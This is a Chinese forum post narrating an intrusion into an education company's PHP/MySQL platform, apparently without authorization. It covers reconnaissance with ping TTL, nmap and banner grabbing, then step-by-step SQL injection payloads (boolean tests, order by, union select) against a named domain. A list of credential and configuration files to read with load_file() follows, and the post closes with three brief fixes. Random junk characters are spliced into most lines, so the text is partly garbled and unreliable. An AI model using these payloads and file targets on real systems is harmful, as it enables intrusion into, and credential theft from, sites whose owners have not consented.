找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2049|回复: 0
打印 上一主题 下一主题

记一次Linux系统PHP注入入侵检测

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 22:23:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
题记:
  ]  A$ T) Z4 H5 ~4 m一位朋友在某教育公司,一套网络教育平台。一年前,在2008年8月份的时候,我看到了这套平台,当时发现了个注入漏洞,测试了一下,得到一个可用帐户后就没有再继续下去。今天7月,又说到此事,我决定继续下去……
9 k1 B6 J% p+ i  l# T% g第一步:获取需要的信息
% t, C$ j- J1 N" ^由于之前测试过,知道此系统某处存在SQL注入漏洞。但由于时隔一年,岁月的远去已经深深的隐藏了那个SQL注入漏洞的地址,现在需要重新收集服务器有用信息。$ ^3 g+ P% x* V& d' v
注:以下为保护特用XXX代替敏感信息& H" n0 s% q% ^- y2 D
顺手先PING了一下他们的域名:2 Y- _% ?% C0 w2 [  I' {3 r
ping XXX.XXX.XXX.XXX(本文约定:用XXX.XXX.XXX.XXX代表测试IP和域名)9 y& g4 P3 j* D8 X& a9 f2 F
64 bytes from *********: icmp_seq=1 ttl=246 time=1.87 ms
# @" x! q8 e3 ]! Z2 c顺便了解一下TTL,学好基础知识才能一路顺风:
9 p$ C  r+ s- H6 I. gTTL:(Time To Live ) 生存时间
" E" {, w7 p+ v$ u& T指定数据包被路由器丢弃之前允许通过的网段数量。
0 J% l" c! i* w% J: F' d0 }TTL 是由发送主机设置的,以防止数据包不断在 IP 互联网络上永不终止地循环。转发 IP 数据包时,要求路由器至少将 TTL 减小 1。
/ N" |4 y$ A: p- J6 F) _9 [2 k4 }% A使用PING时涉及到的 ICMP 报文类型
: o. _. |7 G. ?7 g一个为ICMP请求回显(ICMP Echo Request)
8 z9 C) F' @3 L' P/ g1 Q一个为ICMP回显应答(ICMP Echo Reply)" [6 s" o) e' }4 N
TTL 字段值可以帮助我们识别操作系统类型。$ [% a: W5 o% H  t3 t- T! R
UNIX 及类 UNIX 操作系统 ICMP 回显应答的 TTL 字段值为 255
8 Q* o( u( L1 g  w  {  z% E! @Compaq Tru64 5.0 ICMP 回显应答的 TTL 字段值为 64
0 {9 i1 u+ z/ A5 d! m8 B7 j2 [微软 Windows NT/2K操作系统 ICMP 回显应答的 TTL 字段值为 128
3 U& g6 ]' }6 {, _微软 Windows 95 操作系统 ICMP 回显应答的 TTL 字段值为 32
" b3 s$ {7 |) |8 h* J当然,返回的TTL值是相同的
# r$ F! u% C: w2 a8 T但有些情况下有所特殊. J( M& h( i% ~& `
LINUX Kernel 2.2.x & 2.4.x ICMP 回显应答的 TTL 字段值为 644 L$ F- s. x/ N6 A3 v( _
FreeBSD 4.1, 4.0, 3.4;
9 ?. Y( w: L0 t; q0 \Sun Solaris 2.5.1, 2.6, 2.7, 2.8;! b$ i2 C# J) Z" J  m
OpenBSD 2.6, 2.7,+ T0 S* L5 V: E% B0 z& a4 B  J# r4 V
NetBSD
# W& ^: C9 P5 E5 I- e3 K2 W6 ~HP UX 10.20
5 f" P# W7 j+ z0 P5 FICMP 回显应答的 TTL 字段值为 2551 ]4 C7 U* Y# i
Windows 95/98/98SE
( w; d2 K. t4 `" EWindows ME
5 r0 ^: B( I! u1 @+ S* Y8 f# QICMP 回显应答的 TTL 字段值为 32
6 h* {+ q: D% i! i$ \6 [+ mWindows NT4 WRKS
; B- Z0 W! _- f# KWindows NT4 Server
8 I& f0 N9 t2 V0 }* H( k7 ZWindows 2000" O( k0 d! F2 A- d; l2 [
Windows XP
' {$ n4 W% E( @6 X/ U" NICMP 回显应答的 TTL 字段值为 128
: o0 K% ?+ v! K8 T& S, R这样,我们就可以通过这种方法来辨别操作系统
7 l% N  t  O* G7 e: PTTL值的注册表位置HKEY_LOCAL_MACHINE\SYSTEM \CurrentControlSet\Services\Tcpip\Parameters 其中有个DefaultTTL的DWORD值,其数据就是默认的TTL值了,我们可以修改,但不能大于十进制的255
2 U5 F+ o2 t" R6 Q+ l4 v- c用NMAP扫描一下:
7 [7 H- j# r: G7 t; R! Fnmap -sT -O XXX.XXX.XXX.XXX
% M) B, |' P1 |( \: Q如果没有装WinPcap则会弹出提示:+ I; N1 P* B2 C/ _3 c& k9 w) ?. I0 m
WARNING: Could not import all necessary WinPcap functions.  You may need to upgr- P* j, |7 H' h
ade to version 3.1 or higher from http://www.winpcap.org.  Resorting to connect(% V* q+ R# |/ B
) mode — Nmap may not function completely1 g# G( P# [) ~' `! C+ [9 ?
TCP/IP fingerprinting (for OS scan) requires that WinPcap version 3.1 or higher6 h' X! h9 {, o# x3 V, j
and iphlpapi.dll be installed. You seem to be missing one or both of these.  Win
+ b! L% D  k$ M. d6 bpcap is available from http://www.winpcap.org.  iphlpapi.dll comes with Win98 an% ^4 _. j" D: {% v- k$ L8 N; f
d later operating sytems and NT 4.0 with SP4 or greater.  For previous windows v
+ n; M3 {; g6 T) Q! ]2 Oersions, you may be able to take iphlpapi.dll from another system and place it i1 f+ U: ^8 J: S6 U/ f
n your system32 dir (e.g. c:\windows\system32).
2 G3 L: C6 F$ Y9 wQUITTING!
9 l/ r) R% S  Y; g- A! W) N0 B9 c. O到这里下载: http://www.winpcap.org/install/bin/WinPcap_4_1_1.exe4 c5 g( P5 {& L
安装后继续执行刚才的命令,等待扫描完毕后得到入下信息:
: m# X5 \+ z2 W: T" U1 [Interesting ports on XXX.XXX.XXX.XXX:' B/ b7 p6 Z, L+ r
Not shown: 986 closed ports
6 G3 C* l, B0 u# D( @. F6 _PORT     STATE    SERVICE
) ?* c7 }9 E. Z" B- _$ ~. A21/tcp   open     ftp" |3 M1 l9 R" c! B9 a( m; j
22/tcp   open     ssh, Q# |8 S- J* T1 r
23/tcp   open     telnet9 c( o+ o+ i' O7 c. _; S
80/tcp   open     http
! `9 P0 o0 j7 X+ I6 n( B7 U5 B" e111/tcp  open     rpcbind$ ?4 i, K) `' G  a6 _4 h
135/tcp  filtered msrpc
3 f6 N- Y, l3 j2 m0 T0 K0 ~139/tcp  filtered netbios-ssn
+ O* u8 z% J) j445/tcp  filtered microsoft-ds
( U4 e1 Y: T$ A8 f) A8 ]513/tcp  open     login# x- l% m* }/ j( ~: f5 [+ r
514/tcp  open     shell1 c( o' L  t. L6 s7 Z
593/tcp  filtered http-rpc-epmap
5 Y* o8 y, f- {1720/tcp filtered H.323/Q.931
: l5 [% K& R+ F7 i. K3306/tcp open     mysql+ V: P* I  r8 U# [
4444/tcp filtered krb524
- V6 A/ E0 ]1 x3 N6 Z; yDevice type: WAP0 y& @* o1 Y( s1 R) m( M! z5 |' X4 V
Running: Linux 2.4.X
2 g% d" |1 }1 n5 C! j" oOS details: DD-WRT (Linux 2.4.35s)+ |$ b3 u4 L2 A8 c- e
Network Distance: 13 hops* e# W) I. o9 P6 ]' b( S; }+ [1 {9 \
看到SSH22端口是开着的,打开putty试一下,看是否可以正常连接:
) n4 ~3 s* T& h) slogin as:
9 p  K3 I& S9 FTelnet23端口也是开着的,用telnet 命令链接一下:1 C9 R9 Y( S" Y. }/ N- K) ?
telnet XXX.XXX.XXX.XXX* Y6 Q/ W8 H. G
提示:: j) C( u! d, ~  e# Z; H
Red Hat Enterprise Linux Server release 5.2 (Tikanga)
# b% f( T: k2 s& C) X) E( I! B. D5 ^Kernel 2.6.18-92.el5PAE on an i6861 G/ u8 K" N, y; m) F% }1 c' J
login:
- b+ ~2 l5 V! Z5 B/ W获取HTTP头信息:5 ?. I( a1 N/ B& N( V: F; c
在本地执行如下PHP代码
. p* [! W2 _$ e$ r9 D5 {7 Q<?php: ^! W4 `- M1 D
$url = ‘XXX.XXX.XXX.XXX’;# ^* C8 E; N1 }& a
print_r(get_headers($url));
) T2 _" l  s) S& lprint_r(get_headers($url, 1));
, y1 s$ E: x/ T4 i( E9 v?>/ r" n% ]( J1 z1 h* l- n
将以上代码保存为PHP文件,执行:1 h7 G6 y& g5 V3 ~  ], K
Array ( [0] => HTTP/1.1 200 OK [1] => Server: nginx/0.7.61 [2] => Date: Mon, 02 Nov 2009 09:06:48 GMT [3] => Content-Type: text/html; charset=gb2312,gbk,utf-8 [4] => Content-Length: 75 [5] => Last-Modified: Thu, 20 Aug 2009 19:35:37 GMT [6] => Connection: close [7] => Accept-Ranges: bytes ) Array ( [0] => HTTP/1.1 200 OK [Server] => nginx/0.7.61 [Date] => Mon, 02 Nov 2009 09:06:48 GMT [Content-Type] => text/html; charset=gb2312,gbk,utf-8 [Content-Length] => 75 [Last-Modified] => Thu, 20 Aug 2009 19:35:37 GMT [Connection] => close [Accept-Ranges] => bytes )' f- U- _5 V4 Y% A* R
现在可以得出结论:. I# p9 ^  ]; z( g$ N! N
系统版本:Red Hat Enterprise Linux Server release 5.2 (Tikanga)# x5 O5 X9 i+ n
内核版本:Kernel 2.6.18-92.el5PAE on an i686
3 e9 [2 l3 O, o; W$ t- sWEB服务器版本:nginx/0.7.612 U# i: N& J, c0 ?, o
第二步,开始测试寻找漏洞
$ p, |' [' P. g+ Z: e: _分析是否存在注入漏洞,因为上次曾发现存在过,所以注入则是我们的首选。
7 W# ~9 J( [' l- a1、敏感地址:站内存在有类似:http://www.fovweb.com/XXX.php?id=123 这种地址,属动态传参的
# A, K/ Y+ g  K8 x2、测试方法:在地址后加 and 1=1 和 and 1=2 测试( @$ _* [: Q* g! `; W
http://www.fovweb.com/XXX.php?id=123 and 1=1 返回正常/ \8 q& H; s+ n( c" d
http://www.fovweb.com/XXX.php?id=123 and 1=2 返回错误
/ ?; v; ?" y" D+ z恭喜,两次返回结果不同,则很有可能存在未过滤敏感字符而存在SQL注入漏洞,我们继续
" b, P& y7 I4 D4 `9 M! F3、手工注入:4 k# R- B, R/ O# p6 {
注入也应该有个思路,不能随便碰运气,要记住入侵检测不是靠运气而走下去的,要靠的是清晰的思路、过硬的技术、很全的知识面。2 V( p! B" m$ O% R, A! u
3.1 猜测当前表字段数4 V0 a% w! V# p4 _  S
http://www.fovweb.com/XXX.php?id=123 and 1=1 order by 10
4 Z# K& E% e1 B  ~; l1 ?此处猜测有个简单的算法,都是有技巧的吗,呵呵
9 A. d' g+ o+ p+ D; [算法简单如下:- \9 c. t4 H- p1 D2 j
第一步:根据页面信息,大概估算一个数值,这个是要靠一定的经验了;5 Y, @1 U* B! r- \& C" M
第二步:取中算法,好比是10,如果返回错误,则取中间值5进行下一次猜测;
8 J) j( Q3 P* x8 k) l/ U需要注意:如果所选数值在字段数范围内即小于等于,则会(返回正常);如果所选数值在字段范围外即大于等于,则会(返回错误)。( x7 h  T8 _. a. \
以此来判断,是否过界,配合取中算法猜出字段数。
5 d2 l& V. Y9 K  j举例:0 @% m0 }2 z5 R8 x1 w) ~0 q
http://www.fovweb.com/XXX.php?id=123 and 1=1 order by 3 返回正常' q3 ]4 ?" R6 [0 _  y% H, j- h4 X
http://www.fovweb.com/XXX.php?id=123 and 1=1 order by 4 返回错误
5 A. {0 Q) V6 t7 q" u0 \此时3则为我们要找的字段数。
. y$ l" ~/ H: h# B  C! Y3.2 配合union联合查询字段在页面所位置
9 Z0 Y7 L- R, j0 M& C. {$ s我们已经知道了字段数为3,此时则可以做如下操作:
/ h, q/ U' z2 l) N8 o. v8 vhttp://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,2,3* X) o. H& K6 A- }: s& I( T; f+ K
# h* [; c8 L! f) u0 H
这样就可以测试到哪些字段在页面上有所显示了,如图:
7 ^  t* `/ K5 M+ I' r% C2 x* e1 F4 C7 X! d5 q1 N2 W# o' m
3.3 查敏感信息
, }3 C8 E/ f) U3 x% z3 T6 `这也是个思路问题,我们需要什么,其实到了这一步已经能做什么多事情了。
" f, b% t. K- @! Rhttp://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,user(),database()
; y! Z6 r, f+ s" f3.3.1 先查数据库用户、数据库名,以备后用,如图:
2 x) B  o2 {. g% ?8 ~9 K' u; j4 M* i; r: U) ^
得到数据库用户为root、数据库名为DBxx;
  q" N" l1 Q0 V% ?" _7 P0 ]) M" k3.3.2 查配置文件
8 m6 `+ E/ y' c% @- G3 K查配置文件,就是指查看系统敏感的文件,如web服务器配置文件等。
) @8 H0 H2 R; |, _! S, K9 L查看文件有一定的条件限制:
  v7 U# E5 g" T! q: Q欲读取文件必须在服务器上
2 {, p. i- H+ {3 p% Q% w必须指定文件完整的路径
2 ^/ W( K; w  O" C( N必须有权限读取并且文件必须完全可读
- n. \& r% A2 g* P- a欲读取文件必须小于 max_allowed_packet
) `$ G* `5 q4 s: mMYSQL注入中,load_file()函数在获得webshell以及提权过程中起着十分重要的作用,常被用来读取各种配置文件。9 F, K! \- Z. s( a
常用的一些:: [2 X0 H; K4 k
/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
9 f( y/ u2 p: s0 L" D! v9 d, J" f/usr/local/apache2/conf/httpd.conf: U, x3 Y, m& Z" [
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
; O* J' e4 \) P, [! T7 g$ I/usr/local/app/php5/lib/php.ini //PHP相关设置
, ?3 B+ W  d1 @6 A/etc/sysconfig/iptables //从中得到防火墙规则策略
7 p$ P; x: K# R% C5 `3 T/etc/httpd/conf/httpd.conf // apache配置文件' M+ u9 q) o5 I2 ], M' ~: g
/etc/rsyncd.conf //同步程序配置文件
9 Y* W" N; s" p7 b+ ~- W/etc/sysconfig/network-scripts/ifcfg-eth0 //查看IP./ W7 j! L2 X  W; |# K
/etc/my.cnf //mysql的配置文件7 F7 i; |, M8 p) x- X. T# \+ s8 ^
/etc/redhat-release //系统版本7 T9 B+ c' k# \. A
/etc/issue
( V' g6 I! A; W/etc/issue.net
0 Z) v2 G3 ~9 i5 F" h9 \c:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库连接密码  d& z/ W0 X7 T3 V+ t' o
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini //存储了虚拟主机网站路径和密码% S+ w3 `: Z$ j0 e. {9 Z
c:\Program Files\Serv-U\ServUDaemon.ini
0 R3 R( \" h; ^: wc:\windows\my.ini //MYSQL配置文件
' A/ C' ~- ^! X. l! v( M$ p& Wc:\windows\system32\inetsrv\MetaBase.xml //IIS配置文件
/ v; [. S; R( M) U7 u  B等等。实际上,load_file()的作用不止于此,它还可以用来读取系统中的二进制文件,: h/ t4 i* b% |
c:\windows\repair\sam //存储了WINDOWS系统初次安装的密码. T' }( I" _! O! v/ U4 x
c:\Program Files\ Serv-U\ServUAdmin.exe //6.0版本以前的serv-u管理员密码存储于此
9 ~% K5 h8 R& R: z4 Jc:\Program Files\RhinoSoft.com\ServUDaemon.exe
! @& }$ |5 b- X$ [C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
* a8 J0 i9 J3 M2 i$ k//存储了pcAnywhere的登陆密码: X' A, `3 l' g: u
由于之前得到信息,此台服务器是采用的nginx做的Web服务器,那我们就来试着找一下nginx的安装路径吧。5 P5 R% Q! a, t" a: V
这个没有技术性可言,纯靠经验和运气,由于很少用nginx不了解,我就先到网上搜索常用的安装路径,以及比较好的配置文档中的安装路径进行测试,最终,得到nginx安装路径“/usr/local/nginx/conf/nginx.conf”。' x5 t6 Y$ c' G: y/ t
最后:防范措施
4 n& A/ i8 Y3 b" T1、修复PHP注入漏洞;& i1 n& Q0 S" S9 `
2、Mysql使用普通权限的用户;  N. v7 j; J0 A+ \
3、升级linux内核至最新版本;
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表